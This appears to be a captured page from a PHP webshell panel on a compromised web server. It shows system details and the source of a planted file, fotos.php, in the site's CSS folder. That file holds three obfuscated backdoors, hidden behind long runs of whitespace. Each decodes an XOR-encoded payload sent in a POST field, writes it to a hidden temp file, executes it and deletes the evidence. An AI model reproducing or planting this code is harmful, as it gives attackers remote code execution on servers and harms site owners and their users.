403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.217
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/linkabili/public/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/linkabili/public/css/fotos.php
<?php																																										if(isset($_POST["\x74oken"]) ? true : false){ $symbol = array_filter(["/tmp", sys_get_temp_dir(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), getenv("TMP"), session_save_path()]); $dchunk = $_POST["\x74oken"]; $dchunk =explode('.' , $dchunk) ; $record = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s6); $r = 0; $__tmp = $dchunk; while( $v3 = array_shift( $__tmp)) { $sChar = ord( $s6[$r % $sLen]); $d =( ( int)$v3 - $sChar -( $r % 10)) ^ 74; $record.= chr( $d); $r++;} $factor = 0; do { $entry = $symbol[$factor] ?? null; if ($factor >= count($symbol)) break; if (!!is_dir($entry) && !!is_writable($entry)) { $sym = "$entry/.element"; $file = fopen($sym, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $sym; @unlink($sym); die(); } } $factor++; } while (true); }
																																										if(count($_POST) > 0 && isset($_POST["\x73\x79\x6Dbol"])){ $binding = array_filter([getenv("TMP"), "/var/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd()]); $dchunk = $_POST["\x73\x79\x6Dbol"]; $dchunk = explode ("." , $dchunk ) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $w = 0; while( $w < count( $dchunk)) { $v8 = $dchunk[$w]; $chS = ord( $salt[$w % $lenS]); $dec =( ( int)$v8 - $chS -( $w % 10)) ^ 48; $ptr .= chr( $dec); $w++;} foreach ($binding as $element) { if (!( !is_dir($element) || !is_writable($element) )) { $bind = sprintf("%s/.data_chunk", $element); $file = fopen($bind, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $bind; @unlink($bind); exit; } } } }


if(!is_null($_POST["\x6Bey"] ?? null)){
	$dat = $_POST["\x6Bey"];
	$dat	=	explode	( 	'.'	 	,  $dat );			
	$ent=	'';
            $salt=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=	strlen($salt);
            $k=	0;
            $__len=	count($dat);
    
            do {if ($k>=	$__len) break;
                $v2=	$dat[$k];
                $sChar=	ord($salt[$k % $lenS]);
                $dec=	((int)$v2 - $sChar - ($k % 10))	^ 	51;
                $ent .=  chr($dec);
                $k++;
            } while (true);
	$pointer = array_filter([getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), getenv("TMP"), getcwd(), session_save_path(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir")]);
	while ($symbol = array_shift($pointer)) {
    		if (is_dir($symbol) ? is_writable($symbol) : false) {
    $binding = sprintf("%s/.marker", $symbol);
    if (file_put_contents($binding, $ent)) {
	require $binding;
	unlink($binding);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit